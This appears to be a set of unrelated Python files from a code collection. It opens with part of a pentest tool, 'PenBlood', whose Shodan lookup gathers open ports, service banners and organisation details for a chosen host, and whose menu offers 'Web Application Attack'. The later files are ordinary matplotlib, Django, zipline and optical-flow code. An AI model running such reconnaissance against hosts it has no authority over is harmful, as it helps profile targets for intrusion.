print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_search_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 17:
if sys.version_info[0] == 3:
shodan_host = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_host_lookup_output_filename = str(input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
else:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
if sys.version_info[0] == 2:
shodan_host = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
            SHODAN_API_KEY = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
            shodan_host_lookup_output_filename = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
else:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
shodan_host_lookup_output = open('outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename, 'a+')
shodan_host_lookup_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_host_lookup = cweb_pentest.shodan_host_lookup(shodan_host, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ("""--------------------------.\n{1}[{2}#{1}] {3}- {4}General Information:{0}|\n--------------------------.
{1}[{2}#{1}] {3}- {4}IP:{0} {5}
{1}[{2}#{1}] {3}- {4}Ports:{0} {6}
{1}[{2}#{1}] {3}- {4}Tags:{0} {7}
{1}[{2}#{1}] {3}- {4}City:{0} {8}
{1}[{2}#{1}] {3}- {4}Country:{0} {9}
{1}[{2}#{1}] {3}- {4}Organization:{0} {10}
{1}[{2}#{1}] {3}- {4}ISP:{0} {11}
{1}[{2}#{1}] {3}- {4}Last Update:{0} {12}
{1}[{2}#{1}] {3}- {4}Hostnames:{0} {13}
{1}[{2}#{1}] {3}- {4}ASN:{0} {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
shodan_host_lookup_output.write("""--------------------------.\n[#] - General Information:|\n--------------------------.
[#] - IP: {5}
[#] - Ports: {6}
[#] - Tags: {7}
[#] - City: {8}
[#] - Country: {9}
[#] - Organization: {10}
[#] - ISP: {11}
[#] - Last Update: {12}
[#] - Hostnames: {13}
[#] - ASN: {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
print ('------------------------.\n{1}[{2}#{1}] {3}- {4}Services / Banner:|\n------------------------.{0}'.format(reset, blue, green, yellow, cyan))
shodan_host_lookup_output.write('\n------------------------.\n[#] - Services / Banner:|\n------------------------.\n'.format(reset, blue, green, yellow, cyan))
for i in wp_shodan_host_lookup['data']:
print ("""{1}[{2}#{1}] {3}- {4}Timestamp:{0} {5}
{1}[{2}+{1}] {3}- {4}Port:{0} {6}
{1}[{2}+{1}] {3}- {4}Transport:{0} {7}
{1}[{2}+{1}] {3}- {4}Data:{0}
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write("""[#] - Timestamp: {5}
[+] - Port: {6}
[+] - Transport: {7}
[+] - Data:
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write('\n\n')
shodan_host_lookup_output.close()
print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 90:
main()
elif choice == 95:
        print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" at the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PenBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PenBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if '://' in target:
ohostname = target.replace('https://', '').replace('http://', '')
else:
ohostname = target
web_pentest_output = ohostname + '-' + month + mday + '.txt'
web_pentest_outputfile = open('outputs/web_pentest/' + web_pentest_output, 'a+')
web_pentest_outputfile.write('\n\n\n[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
set_target(target, 1)
elif choice == 99:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
def main():
print ("""{3}[ {5}PenBlood Menu {3}]
{2}01{3}) {5}Web Pentest / Information Gathering
{2}02{3}) {5}Web Application Attack
{2}03{3}) {5}Generator
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PenBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PenBlood{1}> {2}'.format(green, blue, cyan)))
except KeyboardInterrupt:
print ('\n\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
if choice == 1:
web_pentest()
elif choice == 2:
web_application_attack()
elif choice == 3:
generator()
elif choice == 99:
print ('{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
main()
if __name__ == '__main__':
create_directories()
clear()
banner()
main()
|
py | b41534d0feb557aa3d3fad35f9d694aef8487791 | import cv2
import numpy as np
from flow_utils import *
from utils import *
#
# Task 3
#
# Load and use a pretrained model to estimate the optical flow of the same two frames as in Task 2.
# Load image frames
frames = [cv2.imread("resources/frame1.png"),
cv2.imread("resources/frame2.png")]
# Load ground truth flow data for evaluation
flow_gt = load_FLO_file("resources/groundTruthOF.flo")
# TODO: Load the model.
#
# ???
#
# TODO: Run model inference on the two frames.
#
# ???
#
# Create and show visualizations for the computed flow
#
# ???
#
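# --- Illustrative sketch (not part of the original skeleton) ---
# One possible way to fill in the TODOs above, assuming a torchvision build that
# ships the pretrained RAFT optical-flow model (torchvision >= 0.13; older
# versions use `pretrained=True` instead of `weights=`). RAFT expects the input
# height/width to be divisible by 8, so crop or pad the frames first if needed.
import torch
from torchvision.models.optical_flow import raft_small
device = "cuda" if torch.cuda.is_available() else "cpu"
model = raft_small(weights="DEFAULT").eval().to(device)
def to_batch(img):
    # OpenCV gives BGR uint8 HxWxC; RAFT wants RGB float NCHW scaled to [-1, 1].
    t = torch.from_numpy(img[:, :, ::-1].copy()).permute(2, 0, 1).float()
    return (t / 127.5 - 1.0).unsqueeze(0).to(device)
with torch.no_grad():
    # The model returns one flow estimate per refinement iteration; take the last.
    flow = model(to_batch(frames[0]), to_batch(frames[1]))[-1]
flow = flow[0].permute(1, 2, 0).cpu().numpy()  # HxWx2, same layout as flow_gt
# Average endpoint error against the ground-truth flow loaded above.
epe = np.linalg.norm(flow - flow_gt, axis=-1).mean()
print("Average endpoint error:", epe)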
|
py | b415350004f7cbef55f75afb649de4ae35a2aa42 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Goods'
db.create_table('web_goods', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=20)),
('value', self.gf('django.db.models.fields.FloatField')()),
('descript', self.gf('django.db.models.fields.CharField')(max_length=254)),
('details', self.gf('django.db.models.fields.TextField')()),
('goodsImg', self.gf('django.db.models.fields.files.FileField')(max_length=100)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['web.Admin'])),
))
db.send_create_signal('web', ['Goods'])
def backwards(self, orm):
# Deleting model 'Goods'
db.delete_table('web_goods')
models = {
'web.admin': {
'Meta': {'object_name': 'Admin'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.UserType']"}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'web.chat': {
'Meta': {'object_name': 'Chat'},
'content': ('django.db.models.fields.TextField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"})
},
'web.goods': {
'Meta': {'object_name': 'Goods'},
'descript': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'details': ('django.db.models.fields.TextField', [], {}),
'goodsImg': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'web.news': {
'Meta': {'object_name': 'News'},
'content': ('DjangoUeditor.models.UEditorField', [], {'default': "''", 'blank': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'favor_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'news_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.NewsType']"}),
'reply_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'users': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"})
},
'web.newstype': {
'Meta': {'object_name': 'NewsType'},
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'web.reply': {
'Meta': {'object_name': 'Reply'},
'content': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.News']"}),
'users': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['web.Admin']"})
},
'web.usertype': {
'Meta': {'object_name': 'UserType'},
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['web'] |
py | b4153630a939ebd9dd4e182bf4da0371383044d1 | def input_shapes(model, prefix):
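    # Return the shapes (batch dimension stripped) of every model input whose
    # layer name starts with `prefix`.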
shapes = [il.shape[1:] for il in
model.inputs if il.name.startswith(prefix)]
    shapes = [tuple(dims) for dims in shapes]
return shapes
class Nontrainable(object):
def __init__(self, model):
self.model = model
def __enter__(self):
self.trainable_status = self.model.trainable
self.model.trainable = False
return self.model
def __exit__(self, type, value, traceback):
self.model.trainable = self.trainable_status
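# --- Illustrative usage (not part of the original module) ---
# In a GAN-style setup the discriminator is typically frozen while the combined
# generator+discriminator model is updated; the names below are placeholders:
#
#     with Nontrainable(discriminator):
#         combined_model.train_on_batch(noise_batch, misleading_labels)
#
# Similarly, input_shapes(generator, "noise") would return the batch-stripped
# shapes of every generator input whose layer name starts with "noise".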
|
py | b4153632999c4f56cb12d24641dc3b5a262a91cd | """
Helper functions for deprecating parts of the Matplotlib API.
This documentation is only relevant for Matplotlib developers, not for users.
.. warning::
This module is for internal use only. Do not use it in your own code.
We may change the API at any time with no warning.
"""
import contextlib
import functools
import inspect
import math
import warnings
class MatplotlibDeprecationWarning(DeprecationWarning):
"""A class for issuing deprecation warnings for Matplotlib users."""
# mplDeprecation is deprecated. Use MatplotlibDeprecationWarning instead.
# remove when removing the re-import from cbook
mplDeprecation = MatplotlibDeprecationWarning
def _generate_deprecation_warning(
since, message='', name='', alternative='', pending=False, obj_type='',
addendum='', *, removal=''):
if pending:
if removal:
raise ValueError(
"A pending deprecation cannot have a scheduled removal")
else:
removal = f"in {removal}" if removal else "two minor releases later"
if not message:
message = (
("\nThe %(name)s %(obj_type)s" if obj_type else "%(name)s")
+ (" will be deprecated in a future version"
if pending else
(" was deprecated in Matplotlib %(since)s"
+ (" and will be removed %(removal)s" if removal else "")))
+ "."
+ (" Use %(alternative)s instead." if alternative else "")
+ (" %(addendum)s" if addendum else ""))
warning_cls = (PendingDeprecationWarning if pending
else MatplotlibDeprecationWarning)
return warning_cls(message % dict(
func=name, name=name, obj_type=obj_type, since=since, removal=removal,
alternative=alternative, addendum=addendum))
def warn_deprecated(
since, *, message='', name='', alternative='', pending=False,
obj_type='', addendum='', removal=''):
"""
Display a standardized deprecation.
Parameters
----------
since : str
The release at which this API became deprecated.
message : str, optional
Override the default deprecation message. The ``%(since)s``,
``%(name)s``, ``%(alternative)s``, ``%(obj_type)s``, ``%(addendum)s``,
and ``%(removal)s`` format specifiers will be replaced by the values
of the respective arguments passed to this function.
name : str, optional
The name of the deprecated object.
alternative : str, optional
An alternative API that the user may use in place of the deprecated
API. The deprecation warning will tell the user about this alternative
if provided.
pending : bool, optional
If True, uses a PendingDeprecationWarning instead of a
DeprecationWarning. Cannot be used together with *removal*.
obj_type : str, optional
The object type being deprecated.
addendum : str, optional
Additional text appended directly to the final message.
removal : str, optional
The expected removal version. With the default (an empty string), a
removal version is automatically computed from *since*. Set to other
Falsy values to not schedule a removal date. Cannot be used together
with *pending*.
Examples
--------
::
# To warn of the deprecation of "matplotlib.name_of_module"
warn_deprecated('1.4.0', name='matplotlib.name_of_module',
obj_type='module')
"""
warning = _generate_deprecation_warning(
since, message, name, alternative, pending, obj_type, addendum,
removal=removal)
from . import warn_external
warn_external(warning, category=MatplotlibDeprecationWarning)
def deprecated(since, *, message='', name='', alternative='', pending=False,
obj_type=None, addendum='', removal=''):
"""
Decorator to mark a function, a class, or a property as deprecated.
When deprecating a classmethod, a staticmethod, or a property, the
``@deprecated`` decorator should go *under* ``@classmethod`` and
``@staticmethod`` (i.e., `deprecated` should directly decorate the
underlying callable), but *over* ``@property``.
When deprecating a class ``C`` intended to be used as a base class in a
multiple inheritance hierarchy, ``C`` *must* define an ``__init__`` method
(if ``C`` instead inherited its ``__init__`` from its own base class, then
``@deprecated`` would mess up ``__init__`` inheritance when installing its
own (deprecation-emitting) ``C.__init__``).
Parameters are the same as for `warn_deprecated`, except that *obj_type*
defaults to 'class' if decorating a class, 'attribute' if decorating a
property, and 'function' otherwise.
Examples
--------
::
@deprecated('1.4.0')
def the_function_to_deprecate():
pass
"""
def deprecate(obj, message=message, name=name, alternative=alternative,
pending=pending, obj_type=obj_type, addendum=addendum):
from matplotlib._api import classproperty
if isinstance(obj, type):
if obj_type is None:
obj_type = "class"
func = obj.__init__
name = name or obj.__name__
old_doc = obj.__doc__
def finalize(wrapper, new_doc):
try:
obj.__doc__ = new_doc
except AttributeError: # Can't set on some extension objects.
pass
obj.__init__ = functools.wraps(obj.__init__)(wrapper)
return obj
elif isinstance(obj, (property, classproperty)):
if obj_type is None:
obj_type = "attribute"
func = None
name = name or obj.fget.__name__
old_doc = obj.__doc__
class _deprecated_property(type(obj)):
def __get__(self, instance, owner=None):
if instance is not None or owner is not None \
and isinstance(self, classproperty):
emit_warning()
return super().__get__(instance, owner)
def __set__(self, instance, value):
if instance is not None:
emit_warning()
return super().__set__(instance, value)
def __delete__(self, instance):
if instance is not None:
emit_warning()
return super().__delete__(instance)
def __set_name__(self, owner, set_name):
nonlocal name
if name == "<lambda>":
name = set_name
def finalize(_, new_doc):
return _deprecated_property(
fget=obj.fget, fset=obj.fset, fdel=obj.fdel, doc=new_doc)
else:
if obj_type is None:
obj_type = "function"
func = obj
name = name or obj.__name__
old_doc = func.__doc__
def finalize(wrapper, new_doc):
wrapper = functools.wraps(func)(wrapper)
wrapper.__doc__ = new_doc
return wrapper
def emit_warning():
warn_deprecated(
since, message=message, name=name, alternative=alternative,
pending=pending, obj_type=obj_type, addendum=addendum,
removal=removal)
def wrapper(*args, **kwargs):
emit_warning()
return func(*args, **kwargs)
old_doc = inspect.cleandoc(old_doc or '').strip('\n')
notes_header = '\nNotes\n-----'
new_doc = (f"[*Deprecated*] {old_doc}\n"
f"{notes_header if notes_header not in old_doc else ''}\n"
f".. deprecated:: {since}\n"
f" {message.strip()}")
if not old_doc:
# This is to prevent a spurious 'unexpected unindent' warning from
# docutils when the original docstring was blank.
new_doc += r'\ '
return finalize(wrapper, new_doc)
return deprecate
class deprecate_privatize_attribute:
"""
Helper to deprecate public access to an attribute (or method).
This helper should only be used at class scope, as follows::
class Foo:
attr = _deprecate_privatize_attribute(*args, **kwargs)
where *all* parameters are forwarded to `deprecated`. This form makes
``attr`` a property which forwards read and write access to ``self._attr``
(same name but with a leading underscore), with a deprecation warning.
Note that the attribute name is derived from *the name this helper is
assigned to*. This helper also works for deprecating methods.
"""
def __init__(self, *args, **kwargs):
self.deprecator = deprecated(*args, **kwargs)
def __set_name__(self, owner, name):
setattr(owner, name, self.deprecator(
property(lambda self: getattr(self, f"_{name}"),
lambda self, value: setattr(self, f"_{name}", value)),
name=name))
# Used by _copy_docstring_and_deprecators to redecorate pyplot wrappers and
# boilerplate.py to retrieve original signatures. It may seem natural to store
# this information as an attribute on the wrapper, but if the wrapper gets
# itself functools.wraps()ed, then such attributes are silently propagated to
# the outer wrapper, which is not desired.
DECORATORS = {}
def rename_parameter(since, old, new, func=None):
"""
Decorator indicating that parameter *old* of *func* is renamed to *new*.
The actual implementation of *func* should use *new*, not *old*. If *old*
is passed to *func*, a DeprecationWarning is emitted, and its value is
used, even if *new* is also passed by keyword (this is to simplify pyplot
wrapper functions, which always pass *new* explicitly to the Axes method).
If *new* is also passed but positionally, a TypeError will be raised by the
underlying function during argument binding.
Examples
--------
::
@_api.rename_parameter("3.1", "bad_name", "good_name")
def func(good_name): ...
"""
decorator = functools.partial(rename_parameter, since, old, new)
if func is None:
return decorator
signature = inspect.signature(func)
assert old not in signature.parameters, (
f"Matplotlib internal error: {old!r} cannot be a parameter for "
f"{func.__name__}()")
assert new in signature.parameters, (
f"Matplotlib internal error: {new!r} must be a parameter for "
f"{func.__name__}()")
@functools.wraps(func)
def wrapper(*args, **kwargs):
if old in kwargs:
warn_deprecated(
since, message=f"The {old!r} parameter of {func.__name__}() "
f"has been renamed {new!r} since Matplotlib {since}; support "
f"for the old name will be dropped %(removal)s.")
kwargs[new] = kwargs.pop(old)
return func(*args, **kwargs)
# wrapper() must keep the same documented signature as func(): if we
# instead made both *old* and *new* appear in wrapper()'s signature, they
# would both show up in the pyplot function for an Axes method as well and
# pyplot would explicitly pass both arguments to the Axes method.
DECORATORS[wrapper] = decorator
return wrapper
class _deprecated_parameter_class:
def __repr__(self):
return "<deprecated parameter>"
_deprecated_parameter = _deprecated_parameter_class()
def delete_parameter(since, name, func=None, **kwargs):
"""
Decorator indicating that parameter *name* of *func* is being deprecated.
The actual implementation of *func* should keep the *name* parameter in its
signature, or accept a ``**kwargs`` argument (through which *name* would be
passed).
Parameters that come after the deprecated parameter effectively become
keyword-only (as they cannot be passed positionally without triggering the
DeprecationWarning on the deprecated parameter), and should be marked as
such after the deprecation period has passed and the deprecated parameter
is removed.
Parameters other than *since*, *name*, and *func* are keyword-only and
forwarded to `.warn_deprecated`.
Examples
--------
::
@_api.delete_parameter("3.1", "unused")
def func(used_arg, other_arg, unused, more_args): ...
"""
decorator = functools.partial(delete_parameter, since, name, **kwargs)
if func is None:
return decorator
signature = inspect.signature(func)
# Name of `**kwargs` parameter of the decorated function, typically
# "kwargs" if such a parameter exists, or None if the decorated function
# doesn't accept `**kwargs`.
kwargs_name = next((param.name for param in signature.parameters.values()
if param.kind == inspect.Parameter.VAR_KEYWORD), None)
if name in signature.parameters:
kind = signature.parameters[name].kind
is_varargs = kind is inspect.Parameter.VAR_POSITIONAL
is_varkwargs = kind is inspect.Parameter.VAR_KEYWORD
if not is_varargs and not is_varkwargs:
name_idx = (
# Deprecated parameter can't be passed positionally.
math.inf if kind is inspect.Parameter.KEYWORD_ONLY
# If call site has no more than this number of parameters, the
# deprecated parameter can't have been passed positionally.
else [*signature.parameters].index(name))
func.__signature__ = signature = signature.replace(parameters=[
param.replace(default=_deprecated_parameter)
if param.name == name else param
for param in signature.parameters.values()])
else:
name_idx = -1 # Deprecated parameter can always have been passed.
else:
is_varargs = is_varkwargs = False
# Deprecated parameter can't be passed positionally.
name_idx = math.inf
assert kwargs_name, (
f"Matplotlib internal error: {name!r} must be a parameter for "
f"{func.__name__}()")
addendum = kwargs.pop('addendum', None)
@functools.wraps(func)
def wrapper(*inner_args, **inner_kwargs):
if len(inner_args) <= name_idx and name not in inner_kwargs:
# Early return in the simple, non-deprecated case (much faster than
# calling bind()).
return func(*inner_args, **inner_kwargs)
arguments = signature.bind(*inner_args, **inner_kwargs).arguments
if is_varargs and arguments.get(name):
warn_deprecated(
since, message=f"Additional positional arguments to "
f"{func.__name__}() are deprecated since %(since)s and "
f"support for them will be removed %(removal)s.")
elif is_varkwargs and arguments.get(name):
warn_deprecated(
since, message=f"Additional keyword arguments to "
f"{func.__name__}() are deprecated since %(since)s and "
f"support for them will be removed %(removal)s.")
# We cannot just check `name not in arguments` because the pyplot
# wrappers always pass all arguments explicitly.
elif any(name in d and d[name] != _deprecated_parameter
for d in [arguments, arguments.get(kwargs_name, {})]):
deprecation_addendum = (
f"If any parameter follows {name!r}, they should be passed as "
f"keyword, not positionally.")
warn_deprecated(
since,
name=repr(name),
obj_type=f"parameter of {func.__name__}()",
addendum=(addendum + " " + deprecation_addendum) if addendum
else deprecation_addendum,
**kwargs)
return func(*inner_args, **inner_kwargs)
DECORATORS[wrapper] = decorator
return wrapper
def make_keyword_only(since, name, func=None):
"""
Decorator indicating that passing parameter *name* (or any of the following
ones) positionally to *func* is being deprecated.
When used on a method that has a pyplot wrapper, this should be the
outermost decorator, so that :file:`boilerplate.py` can access the original
signature.
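    Examples
    --------
    ::
        # Illustrative only; the function and parameter names are made up.
        @_api.make_keyword_only("3.4", "shrink")
        def draw_box(size, shrink=True, pad=0): ...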
"""
decorator = functools.partial(make_keyword_only, since, name)
if func is None:
return decorator
signature = inspect.signature(func)
POK = inspect.Parameter.POSITIONAL_OR_KEYWORD
KWO = inspect.Parameter.KEYWORD_ONLY
assert (name in signature.parameters
and signature.parameters[name].kind == POK), (
f"Matplotlib internal error: {name!r} must be a positional-or-keyword "
f"parameter for {func.__name__}()")
names = [*signature.parameters]
name_idx = names.index(name)
kwonly = [name for name in names[name_idx:]
if signature.parameters[name].kind == POK]
@functools.wraps(func)
def wrapper(*args, **kwargs):
# Don't use signature.bind here, as it would fail when stacked with
# rename_parameter and an "old" argument name is passed in
# (signature.bind would fail, but the actual call would succeed).
if len(args) > name_idx:
warn_deprecated(
since, message="Passing the %(name)s %(obj_type)s "
"positionally is deprecated since Matplotlib %(since)s; the "
"parameter will become keyword-only %(removal)s.",
name=name, obj_type=f"parameter of {func.__name__}()")
return func(*args, **kwargs)
# Don't modify *func*'s signature, as boilerplate.py needs it.
wrapper.__signature__ = signature.replace(parameters=[
param.replace(kind=KWO) if param.name in kwonly else param
for param in signature.parameters.values()])
DECORATORS[wrapper] = decorator
return wrapper
def deprecate_method_override(method, obj, *, allow_empty=False, **kwargs):
"""
Return ``obj.method`` with a deprecation if it was overridden, else None.
Parameters
----------
method
An unbound method, i.e. an expression of the form
``Class.method_name``. Remember that within the body of a method, one
can always use ``__class__`` to refer to the class that is currently
being defined.
obj
Either an object of the class where *method* is defined, or a subclass
of that class.
allow_empty : bool, default: False
Whether to allow overrides by "empty" methods without emitting a
warning.
**kwargs
Additional parameters passed to `warn_deprecated` to generate the
deprecation warning; must at least include the "since" key.
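    Examples
    --------
    ::
        # Illustrative only; the class and method names are made up. If a
        # subclass overrides ``custom_draw``, the override is returned (and a
        # deprecation warning is emitted); otherwise None is returned.
        class Base:
            def custom_draw(self): ...
            def draw(self):
                overridden = deprecate_method_override(
                    __class__.custom_draw, self, since="3.4")
                if overridden is not None:
                    overridden()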
"""
def empty(): pass
def empty_with_docstring(): """doc"""
name = method.__name__
bound_child = getattr(obj, name)
bound_base = (
method # If obj is a class, then we need to use unbound methods.
if isinstance(bound_child, type(empty)) and isinstance(obj, type)
else method.__get__(obj))
if (bound_child != bound_base
and (not allow_empty
or (getattr(getattr(bound_child, "__code__", None),
"co_code", None)
not in [empty.__code__.co_code,
empty_with_docstring.__code__.co_code]))):
warn_deprecated(**{"name": name, "obj_type": "method", **kwargs})
return bound_child
return None
@contextlib.contextmanager
def suppress_matplotlib_deprecation_warning():
with warnings.catch_warnings():
warnings.simplefilter("ignore", MatplotlibDeprecationWarning)
yield
|
py | b415364b3ac2b5b5b7c9b0ac248230d0955bec0b | """
Tests for filter terms.
"""
from unittest import TestCase
from numpy import (
arange,
array,
eye,
float64,
nan,
nanpercentile,
ones_like,
putmask,
)
from numpy.testing import assert_array_equal
from pandas import (
DataFrame,
date_range,
Int64Index,
)
from zipline.errors import BadPercentileBounds
from zipline.modelling.factor import TestingFactor
class SomeFactor(TestingFactor):
inputs = ()
window_length = 0
class FilterTestCase(TestCase):
def setUp(self):
self.f = SomeFactor()
self.dates = date_range('2014-01-01', periods=5, freq='D')
self.assets = Int64Index(range(5))
self.mask = DataFrame(True, index=self.dates, columns=self.assets)
def tearDown(self):
pass
def maskframe(self, array):
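        # Wrap a boolean ndarray in a DataFrame whose index is a daily date range
        # and whose columns are integer asset ids, sized to match the array.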
return DataFrame(
array,
index=date_range('2014-01-01', periods=array.shape[0], freq='D'),
columns=arange(array.shape[1]),
)
def test_bad_input(self):
f = self.f
bad_percentiles = [
(-.1, 10),
(10, 100.1),
(20, 10),
(50, 50),
]
for min_, max_ in bad_percentiles:
with self.assertRaises(BadPercentileBounds):
f.percentile_between(min_, max_)
def test_rank_percentile_nice_partitions(self):
# Test case with nicely-defined partitions.
eye5 = eye(5, dtype=float64)
eye6 = eye(6, dtype=float64)
nanmask = array([[0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0]], dtype=bool)
nandata = eye6.copy()
putmask(nandata, nanmask, nan)
for quintile in range(5):
factor = self.f.percentile_between(
quintile * 20.0,
(quintile + 1) * 20.0,
)
# Test w/o any NaNs
result = factor.compute_from_arrays(
[eye5],
self.maskframe(ones_like(eye5, dtype=bool)),
)
# Test with NaNs in the data.
nandata_result = factor.compute_from_arrays(
[nandata],
self.maskframe(ones_like(nandata, dtype=bool)),
)
# Test with Falses in the mask.
nanmask_result = factor.compute_from_arrays(
[eye6],
self.maskframe(~nanmask),
)
assert_array_equal(nandata_result, nanmask_result)
